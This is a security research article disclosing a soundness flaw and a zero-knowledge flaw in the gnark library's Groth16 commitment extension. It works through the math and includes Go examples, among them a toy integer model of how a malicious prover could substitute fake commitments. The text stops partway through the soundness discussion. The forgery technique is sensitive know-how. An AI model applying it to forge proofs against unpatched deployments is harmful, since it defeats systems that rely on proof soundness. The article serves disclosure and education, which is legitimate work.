gnark↗ is a popular zkSNARK library written in Go. One of the two proving schemes offered by gnark’s backend is a variant of the Groth16 scheme: gnark extends standard Groth16 with commitments. In this article, we discuss two vulnerabilities that we found in this extension. The first breaks soundness and could allow a malicious prover to prove incorrect statements whenever at least two commitments are used (CVE-2024-45039↗). The second breaks the zero-knowledge property of Groth16 proofs produced by gnark using commitments (CVE-2024-45040↗). In some cases, an attacker could use this vulnerability to recover private witnesses from a proof. We reported both vulnerabilities to the gnark team, and they have been fixed in version 0.11.0↗. Unless otherwise stated, the discussion below is based on gnark version 0.10.0.

This article begins, in the first two sections, by introducing gnark and fixing notation, as well as recalling the main components of the Groth16 proving system. In the third section, we motivate and describe gnark’s extension to Groth16 involving commitments. Building from there, the fourth section explains the first of the two vulnerabilities, the soundness break. Before explaining the second vulnerability in the sixth section, we take a step back and discuss commitment schemes and their security properties, particularly for Pedersen commitments. We provide some background on how we found the vulnerabilities, as well as a timeline, at the end.

## What Is gnark?

In this section, we will introduce gnark and its components via an example, assuming the reader already has basic familiarity with what zero-knowledge proofs are. (If you need an introduction to that first, check out our earlier blog post on an introduction to zero-knowledge.)

### Circuit Variables and Constraints

There are several parts involved in producing ZK proofs. The very first step is to define what it is we would like to prove. As an example, let us say we want to prove that a public natural number $N$ is not prime. Moreover, we would like to prove that we actually know $A, B > 1$ such that $N = A\cdot B$. Given this specification, we then need to define a circuit consisting of circuit variables, which can be private witnesses or public instances, together with constraints that these circuit variables need to satisfy. Defining a circuit like this is functionality offered by gnark’s front end. Here is how this could look for our example so far:

```go
// Here we define which circuit variables our circuit will have.
type ExampleCircuit struct {
	A frontend.Variable // Private witness
	B frontend.Variable // Private witness
	N frontend.Variable `gnark:",public"` // Public instance
}

// This function defines the constraints for our circuit.
func (circuit *ExampleCircuit) Define(api frontend.API) error {
	api.AssertIsEqual(circuit.N, api.Mul(circuit.A, circuit.B)) // N = A*B
	api.AssertIsDifferent(circuit.A, 0)                         // A != 0
	api.AssertIsDifferent(circuit.A, 1)                         // A != 1
	api.AssertIsDifferent(circuit.B, 0)                         // B != 0
	api.AssertIsDifferent(circuit.B, 1)                         // B != 1
	return nil
}
```

We first defined three circuit variables $A$, $B$, and $N$, making $N$ public. By default, circuit variables in gnark are private witnesses. The function `Define` is then used to introduce constraints. In this case, we constrained $N = A \cdot B$ as well as ruled out that $A$ or $B$ is 0 or 1.

### Arithmetic Modulo $p$

This is not enough to actually ensure our statement, however. While in our original statement $N$, $A$, and $B$ were natural numbers, in the circuit we are actually working with elements of a prime field, so integers modulo a prime $p$. The constraint we introduced only ensures that $N$ and $A\cdot B$ have the same remainder when reduced modulo $p$. So how do we deal with that? One way would be to constrain $A$ and $B$ to be small enough that their product can never be as large as $p$. For example, if we only plan to use this circuit for $N$, which is at most a 16-bit number, then correct $A$ and $B$ will also be at most 16 bits wide. The $p$ we will later use will be a 254-bit number, so constraining $A$ and $B$ to be at most 16 bits wide will ensure that no wraparound can happen on multiplication.

### Range Checks

So how do we actually constrain $A$ and $B$ to be at most 16 bits wide? Checks like this are called range checks and are very common when writing circuits. Because of this, gnark’s standard library already contains an optimized implementation of range checks, which we can use without needing to implement the logic ourselves:

```go
const bitnum = 16

// This function defines the constraints for our circuit.
func (circuit *ExampleCircuit) Define(api frontend.API) error {
	api.AssertIsEqual(circuit.N, api.Mul(circuit.A, circuit.B)) // N = A*B
	api.AssertIsDifferent(circuit.A, 0)                         // A != 0
	api.AssertIsDifferent(circuit.A, 1)                         // A != 1
	api.AssertIsDifferent(circuit.B, 0)                         // B != 0
	api.AssertIsDifferent(circuit.B, 1)                         // B != 1

	rangeChecker := rangecheck.New(api)
	rangeChecker.Check(circuit.A, bitnum) // 0 <= A < 2^bitnum
	rangeChecker.Check(circuit.B, bitnum) // 0 <= B < 2^bitnum
	return nil
}
```

### Proving Scheme

If we want to use gnark to produce proofs for this circuit, we first need to decide on the proving scheme and elliptic curve we would like to use. There are two proving schemes available: PlonK and (a variant of) Groth16. In this article, we only consider Groth16. There are also multiple curves available, and we choose the BN254 curve in our examples.

### Running Setup, Prover, and Verifier

Before we can produce an actual Groth16 proof for the above circuit, we must first run the setup, producing a proving key and a verification key. The proving key will then be used by the prover along with the public instances and private witnesses to produce the proof, and the verification key will be used by the verifier together with the public instances and the proof to check whether the proof is valid. The code for this looks as follows:

```go
func main() {
	// Compiles our circuit into an R1CS constraint system
	var circuit ExampleCircuit
	ccs, _ := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circuit)

	// Groth16 setup, generating the proving key and verification key
	pk, vk, _ := groth16.Setup(ccs)

	// Witness definition
	assignment := ExampleCircuit{A: 3, B: 10, N: 30}
	witness, _ := frontend.NewWitness(&assignment, ecc.BN254.ScalarField())
	publicInstances, _ := witness.Public()

	// Proving
	proof, _ := groth16.Prove(ccs, pk, witness)

	// Verifying
	groth16.Verify(proof, vk, publicInstances)
}
```

If we run this, we will get output like the following, showing the proof was successfully produced and verified:

```
19:32:11 INF compiling circuit
19:32:11 INF parsed circuit inputs nbPublic=1 nbSecret=2
19:32:11 INF building constraint builder nbConstraints=29
19:32:11 DBG constraint system solver done nbConstraints=29 took=0.698133
19:32:11 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=29 took=2.139242
19:32:11 DBG verifier done backend=groth16 curve=bn254 took=3.499106
```

### The Zero-Knowledge Property

The zero-knowledge property means in this example that knowing only the public instance $N$ and the proof (as well as the verification and proving keys), it should be impossible to recover any knowledge about $A$ and $B$ apart from what is constrained in the circuit. In the example $N=30$, there are six nontrivial divisors of $N$, namely $2,3,5,6,10$, and $15$. Possibilities for $(A, B)$ are thus $(2, 15), (3, 10), (5, 6), (6, 5), (10, 3)$, and $(15, 2)$. There should be no way to check which of these the prover actually used. As we will later see, a vulnerability in the extension to Groth16 that was used by gnark meant that this was violated and it was in fact possible to recover what $A$ and $B$ were (up to version 0.10.0, fixed in version 0.11.0).
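For the curious, a few lines of plain Go (unrelated to gnark’s API) confirm this list of possible assignments:

```go
package main

import "fmt"

// factorPairs returns all pairs (a, b) with a*b == n and 1 < a, b < n.
func factorPairs(n int) [][2]int {
	var pairs [][2]int
	for a := 2; a < n; a++ {
		if n%a == 0 {
			b := n / a
			if b > 1 && b < n {
				pairs = append(pairs, [2]int{a, b})
			}
		}
	}
	return pairs
}

func main() {
	fmt.Println(factorPairs(30)) // the six valid assignments for (A, B)
}
```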

## Groth16 Proofs

Before we can discuss gnark’s extension to Groth16, we first briefly review how proofs for the original variant of Groth16 are constructed and verified. The Groth16 proving system was introduced in the paper “On the Size of Pairing-based Non-interactive Arguments↗” by Jens Groth, and the following summary closely follows section 3.2 of that paper.

For readers already familiar with the Groth16 proving system, the purpose of this section is mainly to fix notation and provide, for reference, the relevant formulas that we will use throughout the article. For readers who are not familiar with the details of Groth16, the main takeaways are the following:

- The circuit variables are $a_1, \dots, a_m$, with $a_1,\dots, a_\ell$ the public inputs, and $a_{\ell+1}, \dots, a_m$ private witnesses.
- Out of the constraints of the circuit, a black-box setup process spits out a bunch of elliptic curve points that we give names like $L_i$ or $\alpha$. A list can be found in the table below.
- A proof consists of three elliptic curve points $A$, $B'$, and $C$, and there are formulas for how they are to be calculated by the prover from the points obtained from the setup step and from some $h_i$ that we treat as a black box for the purpose of this article. Why the formulas for these three points look the way they do is not relevant for this article, but we state the formulas because we will modify them later, when discussing gnark’s extension.
- There is an equation, given in the “Verifying” section below, that is checked by the verifier. The verifier accepts a proof if and only if the equation holds. Again, why this equation looks the way it does can be taken as given, but we state the equation as it will be modified later.
- Soundness of the Groth16 proving system means that if this equation holds, then the prover must have known witnesses satisfying the circuit constraints.

### Setup

There are three main parts that together make up the Groth16 proving system: the setup, the prover, and the verifier. The setup depends on the circuit and produces a proving key and a verifying key. The former is used by the prover, together with an assignment for the circuit variables, to produce a proof; the latter is used by the verifier, together with the public instances, to check the validity of a proof.

The table below describes the data that make up the proving and verifying keys. We give both the notation used in the Groth16 paper as well as the notation used in the gnark source code. We also fix notation we will use below. In the **group** column, we specify which group the element is an element of, either $\mathbb{G}_1$ or $\mathbb{G}_2$. Those two abelian groups are subgroups of elliptic curves and come together with a suitable pairing $e\colon\mathbb{G}_1 \times \mathbb{G}_2 \to \mathbb{G}_T$. For readers who would like an introduction, we have an earlier article introducing what elliptic curve pairings are.
The precise ranges for $i$ in the various rows, how $u_i, v_i, w_i$ relate to the circuit, and so on is not relevant for our exposition, so we will not go into those questions. The interested reader can find the details in the Groth16 paper. The constant $\ell$ stands for the number of public instances. The notation $\left[x\right]_k$ refers to $x\cdot G_k$, where $x$ is an element of the scalar field and $G_k$ is a fixed generator for $\mathbb{G}_k$.

| | Group | Notation in this article | Notation in gnark | Notation in Groth16 |
|---|---|---|---|---|
| Proving key | $\mathbb{G}_1$ | $\overline{\alpha} = \left[\alpha\right]_1$ | `G1.Alpha` | $\left[\alpha\right]_1$ |
| | | $\overline{\beta} = \left[\beta\right]_1$ | `G1.Beta` | $\left[\beta\right]_1$ |
| | | $\overline{\delta} = \left[\delta\right]_1$ | `G1.Delta` | $\left[\delta\right]_1$ |
| | | $A_i$ | `G1.A[i]` | $\left[u_i(x)\right]_1$ |
| | | $B_i$ | `G1.B[i]` | $\left[v_i(x)\right]_1$ |
| | | $Z_i$ | `G1.Z[i]` | $\left[\frac{x^i t(x)}{\delta}\right]_1$ |
| | | $K_{i+\ell+1}$ | `G1.K[i]` | $\left[\frac{\beta u_{i+\ell+1}(x) + \alpha v_{i+\ell+1}(x) + w_{i+\ell+1}(x)}{\delta}\right]_1$ |
| | $\mathbb{G}_2$ | $\overline{\beta}' = \left[\beta\right]_2$ | `G2.Beta` | $\left[\beta\right]_2$ |
| | | $\overline{\delta}' = \left[\delta\right]_2$ | `G2.Delta` | $\left[\delta\right]_2$ |
| | | $B'_i$ | `G2.B[i]` | $\left[v_i(x)\right]_2$ |
| Verifying key | $\mathbb{G}_1$ | $\overline{\alpha} = \left[\alpha\right]_1$ | `G1.Alpha` | $\left[\alpha\right]_1$ |
| | | $\overline{\beta} = \left[\beta\right]_1$ | `G1.Beta` | $\left[\beta\right]_1$ |
| | | $\overline{\delta} = \left[\delta\right]_1$ | `G1.Delta` | $\left[\delta\right]_1$ |
| | | $L_i$ | `G1.K[i]` | $\left[\frac{\beta u_{i}(x) + \alpha v_{i}(x) + w_{i}(x)}{\gamma}\right]_1$ |
| | $\mathbb{G}_2$ | $\overline{\beta}' = \left[\beta\right]_2$ | `G2.Beta` | $\left[\beta\right]_2$ |
| | | $\overline{\delta}' = \left[\delta\right]_2$ | `G2.Delta` | $\left[\delta\right]_2$ |
| | | $\overline{\gamma}' = \left[\gamma\right]_2$ | `G2.Gamma` | $\left[\gamma\right]_2$ |

### Proving

The prover takes as input the proving key and an assignment for the circuit variables $\left(a_1, \dots, a_m\right)$. Here, $a_1$ through $a_\ell$ are the public instances and $a_{\ell+1}$ through $a_{m}$ are the private witnesses. To simplify notation, we also set $a_0=1$.

The prover then calculates three group elements (two of $\mathbb{G}_1$ and one of $\mathbb{G}_2$), which jointly make up the proof. Below we again compare notation for the elements that make up the proof.

| Group | Notation in this article | Notation in gnark | Notation in Groth16 |
|---|---|---|---|
| $\mathbb{G}_1$ | $A$ | `Ar` | $\left[A\right]_1$ |
| $\mathbb{G}_2$ | $B'$ | `Bs` | $\left[B\right]_2$ |
| $\mathbb{G}_1$ | $C$ | `Krs` | $\left[C\right]_1$ |

To calculate $A$, $B'$, and $C$, the prover will first sample random elements $r$ and $s$ of the scalar field and calculate certain elements $h_i$. (The details of this are not relevant for this article.) The proof points are then obtained as follows ($n$ can be thought of as the number of constraints in the circuit).

$\begin{align*} A &= \overline{\alpha} + \sum_{i=0}^{m} a_i \cdot A_i + r\cdot \overline{\delta} \\ B &= \overline{\beta} + \sum_{i=0}^{m} a_i \cdot B_i + s\cdot \overline{\delta} \\ B' &= \overline{\beta}' + \sum_{i=0}^{m} a_i \cdot B'_i + s\cdot \overline{\delta}' \\ C &= \sum_{i=\ell + 1}^{m} a_i\cdot K_i + \sum_{i=0}^{n-2} h_i \cdot Z_i + s\cdot A + r\cdot B - (r\cdot s)\cdot \overline{\delta} \end{align*}$

### Verifying

To verify a proof $\left(A, B', C\right)$ for public instances $\left(a_1, \dots, a_\ell\right)$, the verifier checks whether the following equality holds.

$\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C, \overline{\delta}'\right) \end{equation*}$

## gnark’s Extension to Groth16 Proofs

In this section, we will motivate and discuss the extension to Groth16 that is used by gnark.

### Random Linear Combinations and the Schwartz-Zippel Lemma

To motivate the extension, let us first take a step back and consider a generic problem.
In many situations where a prover wants to convince a verifier of some statements, this involves claims that a number of equalities $f_i = g_i$ hold ($f_i$ and $g_i$ are elements of some finite field $\mathbb{F}_p$ and $0 \leq i < k$).
One way to check all equations at once is checking a random linear combination instead. If $r_i$ are random elements of $\mathbb{F}_p$, then $f_i = g_i$ for all $i$ implies that $\sum_{i=0}^{k-1} r_i \cdot f_i = \sum_{i=0}^{k-1} r_i \cdot g_i$.
On the other hand, if there is a $j$ such that $f_j \neq g_j$, then only one in $p$ tuples $\left(r_0, \dots, r_{k-1}\right)$ will satisfy $\sum_{i=0}^{k-1} r_i \cdot f_i = \sum_{i=0}^{k-1} r_i \cdot g_i$.^{1}
Thus, as long as the values $r_i$ are chosen uniformly at random and independently of $f_i$ and $g_i$, the equality $\sum_{i=0}^{k-1} r_i \cdot f_i = \sum_{i=0}^{k-1} r_i \cdot g_i$ can be taken to be very strong evidence that $f_i = g_i$ for all $i$.

In some situations, calculating the sums on both sides might be cheap while each individual equality check is expensive, so paying for the reduction from $k$ equality checks to a single one with the calculation of the two linear combinations can be an improvement.

A variant of the above method is often used in practice. We can interpret the elements $f_i$ and $g_i$ as the coefficients of polynomials $f$ and $g$ of degree less than $k$. What we would like to show is that $f = g$, or equivalently $f-g = 0$. As $f-g$ is a polynomial of degree at most $k-1$, it must either be the zero polynomial or have at most $k-1$ different roots. The probability of a random element $\tau$ being a root of $f-g$, assuming that $f-g \neq 0$, is thus at most $(k-1) / p$, so tiny if $p$ is large compared to $k$. This statement (generalized to the multivariate case) is known as the Schwartz-Zippel lemma. The upshot is that if $f$ and $g$ evaluate to the same element on a random input $\tau$, then this can be taken as strong evidence for $f=g$. This is similar to the random linear combination check we discussed before, now using $r_i = \tau^i$.

Note that if $\tau$ can be chosen by the prover, then they could just calculate a root of $f-g$, so this would be insecure. Similarly, if $\tau$ is chosen randomly by the verifier but the prover learns $\tau$ before deciding on $f_i$ and $g_i$, they could cheat by, for example, setting $f_0 = \sum_{i=0}^{k-1} g_i \cdot \tau^i - \sum_{i=1}^{k-1} f_i \cdot \tau^i$.

The discussed technique is very widely used, and in fact, the Groth16 proof scheme itself uses it. Looking at the “Notation in Groth16” column in the table for the verification and proving keys above, $x$ plays the role of the random input, and $u_i$ and so on are polynomials related to the circuit’s constraints, which get evaluated at $x$ in order to construct the proving and verifying keys. The proof essentially consists of points obtained by evaluating three polynomials at $x$. The argument for why the verifier’s single equality check implies all constraints is precisely the argument that a low-degree polynomial evaluating to zero at a random point $x$ implies with high probability that the polynomial was already zero.

In Groth16’s case, the value of $x$ is not allowed to be known to the prover, as otherwise the system would be insecure, as previously discussed. Thus, the necessary values derived from $x$ are essentially hidden behind the elliptic curve discrete logarithm problem. (Knowing, for example, $u_i(x) \cdot G_1$ and $G_1$, with $G_1\in\mathbb{G}_1$, it should be computationally infeasible to calculate $u_i(x)$.) While $x$ might be present during the setup process to calculate the proving and verifying key, the value of $x$ is so-called toxic waste; it must be deleted to ensure no prover will know it. In practice, multiparty computation is used in the setup phase to ensure that no single party ever knows toxic-waste values such as $x$.

Given that this is such a useful technique in many places, we might want to use it within a circuit as well. However, we run into a problem here. How do we obtain a random value within the circuit at proving time? We certainly cannot let the prover choose it, as that would be insecure; and since we want a noninteractive protocol, there is no other party that could supply it. One thing we could do is to obtain $\tau$ as a hash of $f_i$ and $g_i$. Given a hash function that can be modeled as a random oracle, this would be secure as well. A malicious prover could try again if the $\tau$ they got is not a root, but as the new $\tau$ obtained after modifying some $f_i$ and/or $g_i$ will be random and unrelated to previously seen values, the best they can do is brute-force.

This procedure allows us to use the technique of reducing checking many equalities to only checking one equality within circuits. However, we now have to compute a hash in circuit, which may be quite expensive itself. It would thus be very useful if a circuit variable could be somehow constrained to be a hash of some other circuit variables without actually having to add these constraints in circuit. This is exactly what the extension to Groth16 that is used by gnark does.

### Splitting Out a Commitment

In order to have hashes of some circuit variables available in circuit, gnark allows the prover to commit to collections of circuit variables. These commitments are elements of $\mathbb{G}_1$, and hashes calculated from them are added as additional public inputs to the circuit. There can be more than one commitment, and each commitment can be to one or more circuit variables, both public instances and private witnesses. In the following, however, we will describe just the case where only private witnesses are committed to, to simplify notation.

How to design such a system? Merely committing to some values is easy, and there are many schemes that can be used to commit to values, such as the Pedersen commitment scheme, which we will discuss later in this article. So the prover could just, in addition to the normal Groth16 proof, also provide some commitments to some values. However, we do not want a Groth16 proof together with some unrelated commitments — we want the committed values to be the same values as the ones assigned to the circuit variables in the Groth16 proof. So there must be some linkage between the commitments and (the verification of) the Groth16 proof. This leads to the idea of splitting off from one of the proof points the summands involving the circuit variables that are to be committed. This split-off point is then used as the commitment. But this point will also still need to be used in the verification equation, thereby linking it to the rest of the Groth16 proof.

Concretely, in the gnark extension, the commitment is removed from the $C$ proof point. This new point will then fill in for the missing part of $C$ in the proof verification. But as it is split off as a separate element, it can be used as input for hashing so that the verifier can compute that additional public input made up of the hashed commitment.

We will keep the notation from before, so $\left(a_1, \dots, a_m\right)$ are the circuit variables, where $a_{\ell+1}$ through $a_m$ are the private witnesses. We assume we want to make $k$ commitments to pairwise disjoint subsets of the private witnesses. For this, we introduce indexing sets $\mathcal{J}_1, \dots, \mathcal{J}_k \subseteq \{\ell + 1, \dots, m\}$. So the $i$-th commitment should commit to the circuit variables $a_{j}$ for $j\in \mathcal{J}_i$. We also introduce notation for the set of indexes of all committed circuit variables: $\mathcal{J} \coloneqq \bigcup\limits_{i=1}^{k} \mathcal{J}_i$. What we can now do is replace the proof point $C$ from vanilla Groth16 (for clarity, we will call the value this point has in vanilla Groth16 $C_{\mathrm{old}}$ below) by a modified $C_{\mathrm{new}}$ and add new points $D_1, \dots, D_k$ for the commitments.

$\begin{align*} C_{\mathrm{old}} &= \sum_{i \in \{\ell+1, \dots, m\} } a_i\cdot K_i + \sum_{i=0}^{n-2} h_i \cdot Z_i + s\cdot A + r\cdot B - (r\cdot s)\cdot \overline{\delta} \\ C_{\mathrm{new}} &= \sum_{i \in \{\ell+1, \dots, m\} \setminus \mathcal{J} } a_i\cdot K_i + \sum_{i=0}^{n-2} h_i \cdot Z_i + s\cdot A + r\cdot B - (r\cdot s)\cdot \overline{\delta} \\ D_i &= \sum_{j \in \mathcal{J}_i } a_j\cdot K_j \end{align*}$

Then the verifier can add the sum of the $D_i$ to $C$ when checking the proof, so instead of

$\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C_{\mathrm{old}}, \overline{\delta}'\right) \end{equation*}$

the check will be

$\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C_{\mathrm{new}} + \sum_{i=1}^k D_i, \overline{\delta}'\right) \end{equation*}$

Now we have points $D_i$ available that depend on the circuit variables committed to for the $i$-th commitment. But the goal we outlined initially was that we wanted to have in-circuit challenges depending on those committed circuit variables, so we need one more step. Let $\mathcal{H}$ be a hash function that maps points of $\mathbb{G}_1$ to $\mathbb{F}_p$. We can then use $\mathcal{H}$ to convert the commitment points to elements of $\mathbb{F}_p$, which we then use as public inputs to the circuit:

$\begin{equation*} a_{\ell-k-1+i} \coloneqq \mathcal{H}(D_i) \end{equation*}$

Now these circuit variables $a_{\ell-k-1+i}$ can be used in circuit as challenges that depend on the circuit variables committed to with $D_i$, for example in Schwartz-Zippel–style equality checks, as discussed above.

As is, there would be a big problem for this scheme, however: the verification does not depend on $C_{\mathrm{new}}$ and all $D_i$ individually, only on the sum $C_{\mathrm{new}} + \sum_{i=1}^k D_i$. A malicious prover could thus just replace the honest $D_i$ by arbitrarily chosen $D_i^{\mathrm{fake}}$ by setting $C_{\mathrm{new}}^{\mathrm{fake}} = C_{\mathrm{new}} + \sum_{i=1}^k D_i - \sum_{i=1}^k D_i^{\mathrm{fake}}$.
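Because the problem is purely about linearity, we can illustrate it with plain integers standing in for the $\mathbb{G}_1$ points (a toy model, not actual curve arithmetic; all concrete numbers are made up):

```go
package main

import "fmt"

// compensate returns the C value a malicious prover would use so that
// C + sum(dFake) equals cNew + sum(d), keeping the verified sum unchanged.
func compensate(cNew int, d, dFake []int) int {
	c := cNew
	for _, x := range d {
		c += x
	}
	for _, x := range dFake {
		c -= x
	}
	return c
}

func main() {
	cNew := 100            // honest C_new
	d := []int{7, 13}      // honest commitments D_1, D_2
	dFake := []int{42, 99} // arbitrary fake commitments
	cFake := compensate(cNew, d, dFake)
	// The verification equation only sees the sum, which is unchanged.
	fmt.Println(cNew+7+13 == cFake+42+99) // true
}
```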

### Preventing Fungibility of the Commitments Using Separate Proofs of Knowledge

So how could one prevent the kind of fungibility of the commitments that we just discussed?

The approach to this is to make the prover supply a proof of knowledge of coefficients $a_j$ for $j \in \mathcal{J}_i$ such that $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot K_j$. This would ensure that $D_i$ is not fully arbitrary but was constructed as a linear combination of the expected points. (We will explain later what such a proof of knowledge looks like.) This helps but is not enough; a malicious prover could still, for example, use $D_i=0$ by just adding the relevant summands that should appear in the legitimate $D_i$ to $C_{\mathrm{new}}$ instead. So we will also have to require a proof of knowledge of the relevant coefficients for $C_{\mathrm{new}}$, ensuring that $C_{\mathrm{new}}$ was constructed as a linear combination of only the expected elliptic curve points.

There is one optimization that we can do here so that we only need proofs of knowledge for the $D_i$. Instead of pairing $D_i$ with $\overline{\delta}'$, grouping it with $C_{\mathrm{new}}$, we could pair $D_i$ with $\overline{\gamma}'$, grouping it with $\sum_{i=0}^{\ell} a_i \cdot L_i$. In this case, we do not need a proof of knowledge that $\sum_{i=0}^{\ell} a_i \cdot L_i$ is of this form, because it is the verifier itself that computes this linear combination, so by construction, it will be a linear combination of only the points $L_i$ with $0 \leq i \leq \ell$. So we save one proof of knowledge. For this, we must slightly adjust $D_i$, however, so that we will have the following:

$\begin{align*} D_i &= \frac{\delta}{\gamma} \cdot \left(\sum_{j \in \mathcal{J}_i } a_j\cdot K_j\right) = \sum_{j \in \mathcal{J}_i } a_j\cdot \left(\frac{\delta}{\gamma} \cdot K_j\right) \end{align*}$

The prover should not know $\delta$, $\gamma$, or $\frac{\delta}{\gamma}$ of course, so the points $\frac{\delta}{\gamma} \cdot K_i$ will be part of the proving key. We actually already have notation that we can use for $\frac{\delta}{\gamma} \cdot K_i$, namely $L_i$. In a vanilla Groth16 proving key, $L_i$ does not appear, and the verification key has $L_j$ for $0 \leq j \leq \ell$. However, the formula for $L_i$ is precisely what $\frac{\delta}{\gamma} \cdot K_i$ is for $i > \ell$. Hence we can write $D_i$ as follows:

$\begin{align*} D_i &= \sum_{j \in \mathcal{J}_i } a_j\cdot L_j \end{align*}$

The verifier will now add $D_i$ to the term from the public input when checking the proof, so it will check that

$\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=1}^k D_i + \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C_{\mathrm{new}}, \overline{\delta}'\right) \end{equation*}$

Assuming the protocol also includes proofs of knowledge for all $D_i$ as mentioned before, showing that the resulting protocol is sound likely boils down to an argument similar to Theorem 1 of the Groth16 paper↗.

The extension used by gnark uses this solution. One of the two vulnerabilities we report on in this article relates to the way that the proofs of knowledge were batched, and we will explain how the proofs of knowledge coming with $D_i$ work in the next section, where we will also explain the vulnerability.

## The Soundness Vulnerability

In this section, we discuss the soundness vulnerability present in gnark up to version 0.10.0 in cases where more than one commitment is used. We will begin by explaining how the proof of knowledge associated with an individual commitment works, then explain how these proofs can be batched, and finally discuss the even more compressed batched verification used by gnark up to version 0.10.0, which, however, resulted in a vulnerability.

### Proofs of Knowledge of Coefficients of a Linear Combination

As explained before, we must require the prover to supply together with $D_i$ a proof of knowledge of coefficients $(a_j)_{j\in\mathcal{J}_i}$ such that $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j$. Such a proof of knowledge must be provided for $1 \leq i \leq k$. We will start by fixing $i$ and discuss how to construct a single such proof of knowledge.

This can be done as follows. During the setup phase, an additional toxic-waste field element $\sigma_i$ is sampled, and $\sigma_i\cdot L_j$ is added to the proving key for $j\in\mathcal{J}_i$. Furthermore, $[\sigma_i]_2 \in \mathbb{G}_2$ is added to the verification key. The prover now provides together with $D_i$ also a point $P_i$ of $\mathbb{G}_1$, calculated as $P_i = \sum_{j \in \mathcal{J}_i } a_j\cdot (\sigma_i \cdot L_j)$. The verifier carries out the following check:

$\begin{equation*} e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} e\left(P_i, [1]_2\right) \end{equation*}$

Why should the above equality convince the verifier that $D_i$ is of the form $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j$? The idea is that a malicious prover could only have arranged this equality to hold if $P_i = \sigma_i \cdot D_i$, but as they do not know $\sigma_i$, the only way they could have managed this is by calculating $D_i$ as a linear combination of points for which multiplication by the scalar $\sigma_i$ is already known. But the only points of that form are $L_j$ for $j\in\mathcal{J}_i$.

### Batching the Proofs of Knowledge

In the previous subsection, we discussed the kind of proof of knowledge needed for each commitment. However, each of these verifications requires two pairings, which are quite expensive. So it would be good if verification of $k$ such proofs of knowledge could be done with fewer than $2\cdot k$ pairings.

This is actually exactly the kind of situation we discussed initially in this article when motivating why in-circuit random challenges and hence commitments are useful: to be able to use Schwartz-Zippel–style compressed equality checks. This is precisely one example where the equality check is expensive, as it involves computing pairings.

Compressing this check in Schwartz-Zippel style thus begins by generating a random challenge $r\in\mathbb{F}_p$. As this happens on the side of the verifier, they can just use a random number generator for this, if one is available. In contexts where the verifier cannot use randomness, one may use $r=\mathcal{H}(D_1,\dots, D_k, P_1, \dots, P_k)$. Then instead of verifying

$\begin{equation*} e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} e\left(P_i, [1]_2\right) \text{ for } 1 \leq i \leq k \end{equation*}$

the verifier can instead verify

$\begin{equation*} \sum_{i=1}^k r^{i-1}e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} \sum_{i=1}^k r^{i-1} e\left(P_i, [1]_2\right) \end{equation*}$

So far nothing is won, as this still involves $2\cdot k$ pairings. However, the right-hand side can be rewritten to be calculated with a single pairing, using bilinearity of $e$, which makes $e\left(\_, [1]_2\right)$ linear.

$\begin{equation*} \sum_{i=1}^k r^{i-1} e\left(P_i, [1]_2\right) = e\left(\sum_{i=1}^k r^{i-1}P_i, [1]_2\right) \end{equation*}$

The upshot is that the verifier may verify the proofs of knowledge $P_1, \dots, P_k$ by checking the following equality.

$\begin{equation*} \sum_{i=1}^k r^{i-1}e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} e\left(\sum_{i=1}^k r^{i-1}P_i, [1]_2\right) \end{equation*}$

This requires $k+1$ pairings: one per summand on the left-hand side, plus one for the right-hand side.

### Proofs of Knowledge for Commitments in gnark up to Version 0.10.0

To compress the equality check we just arrived at even further, one would also like to use bilinearity on the left-hand side to move the sum into the inputs of the pairing, similarly to how it was done for the right-hand side. However, this is not possible, as neither of the two inputs is held constant across the sum, unless $\sigma_i$ is independent of $i$.

Up to version 0.10.0, gnark therefore used the same $\sigma_i = \sigma$ for each of the proofs of knowledge associated with the commitments. This meant that the verification could be compressed further, so that only two pairings were required:

$\begin{equation*} e\left(\sum_{i=1}^k r^{i-1} D_i, [\sigma]_2\right) \stackrel{?}{=} e\left(\sum_{i=1}^k r^{i-1}P_i, [1]_2\right) \end{equation*}$

### The Soundness Vulnerability: Fungibility of Commitments

However, there is an issue with choosing the same $\sigma$ for all the proofs of knowledge as soon as there is more than one. When we argued why the verifier's check should convince them that $D_i$ is of the form $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j$, we used the fact that the only points of $\mathbb{G}_1$ for which the prover also knows their product with $\sigma_i$ are $L_j$ for $j \in \mathcal{J}_i$. However, if $\sigma_1 = \cdots = \sigma_k$, then $L_j$ is such a point for every $j \in \bigcup\limits_{i=1}^{k}\mathcal{J}_i$. Thus, the proofs of knowledge only convince the verifier that the prover knows $a_{l, j}$ so that $D_i = \sum_{l=1}^k \sum_{j \in \mathcal{J}_l } a_{l, j}\cdot L_j$.

